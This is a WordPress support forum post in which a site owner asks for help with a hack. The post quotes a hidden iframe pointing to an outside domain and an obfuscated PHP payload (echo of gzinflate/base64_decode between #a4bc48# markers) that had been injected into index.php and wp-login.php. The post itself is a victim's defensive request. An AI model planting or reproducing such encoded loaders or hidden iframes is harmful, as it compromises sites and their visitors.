iframe hack can't find file that's been compromised

  • Hi there,
    An iframe code has been inserted in one of the wordpress sites I run. I found a line of weird code that looks like the one below on some files (index.php. wp-login.php) and I’ve deleted and replaced them with new ones, but the iframe is still there.

    This is my site: https://tippiocampo.com/

    the iframe (found it using Google Chrome’s “”inspect element feature:
    <iframe src="https://dropshipperportal.com" style="visibility: hidden; position: absolute; left: 0px; top: 0px; " width="10" height="10"></iframe>

    This is the weird code that I found on index.php and wp-login.php that I’ve since deleted.

    #a4bc48#
echo(gzinflate(base64_decode("tVXLcqMwEPwXX4Bi7EUSSKJk7SX7B3t05cDG4FDlRwJ4fUjl31czAtvBj2QPKcuFHqOeVk8L5u1TU790P+sqPNTb5e4wW+6e9pty20WFDSf7phKTWfuyrrs4EBkPolm7/9N2TZiAjEzhYn4VXRm/vX9ccHCFtbYoosouplwD/qVrGUwzECAFqBQkB52A4iBTUG4mhxykpFEOgoNi1D9bVxp4DjqFVIFMMDhl2PExAtyDEbLAIA4pZCkwBpkLBC1hoHKio9Rpv+sLF8f5MUZr5ItLDHO7jhuOcW6eRXOC1zgielPHUFxJ7EAdOs5w4MhbKjqtaxlwBizBhokU5lIULj10hs2Tx77v5ITNUE9Ocw6XqHPKTvzcfsrFOCpEywiZUoTsKYwjFB1Gp31taFkzIuIV9X3WnxqLwHqmksru5XES92T1oI+moaD4hMroZxjpSgLywRIoX07CMJrMe1WOM+6XodSo2oXabml6pc5DOTNKKEi5M14ozy3HjByhvScV7SHHc6rxHdd7p6S0z5vlmv3J4Jfn8Wdxs3lvUhRHDw5SfV2OMiLKyW6gvstvH1iduyb/zDL9FRib5jbeTTMR0i073cE7txldAXY3/GjAa7FfKsj4ZlJZhov3//W9cpMvEb/2Fvu2N7I3zdFPVGmRDD5jNMRTj27qo9ksbVAE5tVOXiemtP2Hq/xbrM3BVqa1QWBWNqiaXRAHm4fnonnYLcvAVLsmrG1i6vlhti63q+7Z1HEcvbW2jX93Tb1dLVaPoVDxYVE/Rub99BUrw6AM2yiIzPxH/8X8Bw==")));
#/a4bc48#

    I would appreciate a nudge towards the right direction please, thanks!

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘iframe hack can't find file that's been compromised’ is closed to new replies.